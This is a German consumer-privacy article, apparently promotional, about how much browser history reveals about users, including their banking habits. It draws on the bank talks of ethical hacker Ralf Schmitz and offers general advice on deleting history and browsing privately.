Zielgerichtete Hackerangriffe auf Finanzinstitute inklusive Datenentwendung/-verlust sind sehr brisant, da Bankdaten besonders viele geschäftliche wie auch private Informationen von Verbrauchern und Unternehmen offenbaren und somit für kriminelle Zwecke missbraucht werden können.

Was weiß der Browser alles über mich? Welche Informationen kennt ein Browser über mich?  Haben Sie sich jemals gefragt, welche Informationen ein Browser speichert und was er alles über Sie kennt?

Es wird nicht nur die IP-Adresse verfolgt, sondern auch andere Daten, die verwendet werden können, um Sie zu identifizieren.  Denn die Browserliste weiß mehr über uns als unsere Partner, Freunde, Bankgeschäfte oder Arbeitgeber.

Ethical Hacker Ralf Schmitz zeigt regelmäßig in seinen Banken-Vorträgen, was alles sichtbar gemacht werden kann. So zuletzt bei der Kreissparkasse in München Starnberg Ebersberg.

Liste aller besuchten Bankseiten Webseiten

Eine vollständige Liste aller besuchten Bankseiten Webseiten offenbart politische, soziale, geschäftliche, wirtschaftliche und erotische Interessen. Ja auch die Schmuddelfilmchen können gespeichert werden.

Diese Liste verrät sind sich die Entwickler einig sehr viel, wann und wo ich Urlaub mache, in welche Restaurants ich gehe, welche Filme und Serien mich ansprechen was für Bankgeschäfte ich tätige, sogar welcher Bank mein Kreditinstitut ist und ob ich eher linke oder rechte Nachrichtenportale lese und wie lange ich auf welchen Seiten bin und welche Links / Werbung ich klicke.  

Die Browser-Liste weiß, wann ich welche Krankheiten hatte  und wann ich ein neues Auto  oder ein neues Handy brauchte. Anhand der Browser-Liste lässt sich auch sagen, ob ich hochpreisige Waren kaufe, wielange ich auf einer Seite gesurft habe oder eher auf mein Budget achten muss. Profiler  bei der Polizei könnten sogar einen Mord aufklären.

Meine Browserhistorie ist ein Abbild meines Lebens. Chronologisch geordnet, davon ist Ralf Schmitz überzeugt.

Die Programmierer bei Opera, Google, Firefox, Edge

Die Programmierer bei Opera, Google, Firefox, Edge und anderen Browser sagen:  wenn man die letzten 130 besuchten Webseiten einer Person kennt, sei dies wie ein eindeutiger „Fingerabdruck“. Selbst bei einem Umzug in ein anderes Land und der Nutzung eines brandneuen Computers könne eine Person bald anhand der besuchten Webseiten zu 80% re-identifiziert werden.

Und deshalb schützen die Entwickler von Webbrowsern unsere Webseiten-Historie so gut sie können. Wie können Sie das alles umgehen?

Ralf Schmitz zeigt konkrete Tipps in seinen Vorträgen. So gibt es Browser die dies alles nicht zulassen oder eine  sichere Methode ist es nämlich, erst gar keine Historie anzulegen  oder Sie direkt am selben Tag wieder zu löschen und keine Freigabe der Daten zu zu stimmen.

Freigabe der Daten zu zu stimmen.

Auch wenn Opera Firefox, Edge, Chrome und die Liste der besuchten Webseiten vor unbefugtem Zugriff Dritter schützt, lässt sich vieles über Umwege trotzdem auslesen, weiß Ralf Schmitz zu berichten.  Selbst ein Screenshot einer Webseite sagt viel aus, wenn Links dort entweder blau (bereits besucht) oder weiß (noch nicht besucht) angezeigt werden.

Ganz spannend wird es aber bei den Bankdaten, wenn man wieder  die Sparda Banken Seite besucht oder ein Konto bei einer Volksbank, Sparkasse hat oder bei einer Direktbank.

Sollte dann noch ein Hacker Zugang zu dem PC haben, kann er mit 2-3 Klicks den kompletten Browserverlauf auslesen und Sie wundern sich dann , wie ein bestimmter Betrag von Ihrem Konto abgebucht wurde. 

Was weiß der Browser alles über mich?

Und um das Ganze noch auf die Spitze zu treiben, wurde in einem Hackerforum gerade bei Twitter eine Stellenausschreibung angezeigt, auf die man sich durch einen einfachen Klick bewerben konnte. Die Aufschrift des Buttons lautet sinngemäß: „Auf diese Stelle bewerben durch Teilen meiner Browser-Historie“. Auch wenn es sich um einen Spaß, handelte, macht alleine die Vorstellung Angst.

Es gibt Menschen die sagen: „Ich habe nichts zu verbergen …von mir darf man alles wissen!“

Dabei geht es gar nicht darum, ob ich etwas zu verbergen habe oder nicht. Geht es nicht darum, dass nicht jeder alles von mir Wissen sollte auch wenn der Chef / Arbeitgeber ganz neugierig ist?

Webbrowser speichern Informationen über Benutzer

Webbrowser speichern Informationen über Benutzer, um deren Erfahrung beim Surfen im Internet zu verbessern. Dazu gehören Dinge wie Cookies, die Daten über besuchte Websites enthalten; Cache, der Bilder und andere Medien zum schnelleren Laden speichert; und Verlauf, der frühere Suchen und angeklickte Links verfolgt.

Diese Daten werden vom Browser gesammelt, um angeblich dem Benutzer besser zugeschnittene Inhalte bereitzustellen. Wenn ein Benutzer beispielsweise häufig Nachrichtenseiten besucht, werden ihm relevantere Nachrichten und Werbung angezeigt. Browser sammeln auch andere persönliche Informationen wie Namen, E-Mail-Adressen, Telefonnummern, physische Adressen und sogar Kreditkartennummern.

Diese Daten werden verwendet, um zielgerichtetere Inhalte wie Anzeigen und Angebote bereitzustellen sowie den Zugriff auf Websites oder Dienste zu ermöglichen, die eine Authentifizierung erfordern.

Schützen Sie Ihre Privatsphäre online

Die Kehrseite davon ist, dass es auch Drittunternehmen erleichtert wird, personenbezogene Daten ohne das Wissen oder die Zustimmung des Benutzers zu sammeln. Fazit: Um Ihre Privatsphäre online zu schützen, ist es wichtig zu verstehen, auf welche Informationen Ihr Webbrowser Zugriff hat und wie er diese Daten verwendet.

Noch besser ist es die Abkürzungen im Internet und die anonymisierten Browser zu kennen. Indem Sie sich die Zeit nehmen, im Netz oder bei Hacker-Vorträgen sich darüber zu informieren, wie Ihr Webbrowser funktioniert und wie er Daten von seinen Benutzern sammelt, können Sie sich besser vor potenziellen böswilligen Hacker schützen, die Ihre personenbezogenen Daten zu ihrem eigenen Vorteil ausnutzen wollen.

Mit diesen einfachen Schritten können Sie sicherstellen, dass Ihr Surferlebnis anonym,sicher und geschützt werden, so Ralf Schmitz.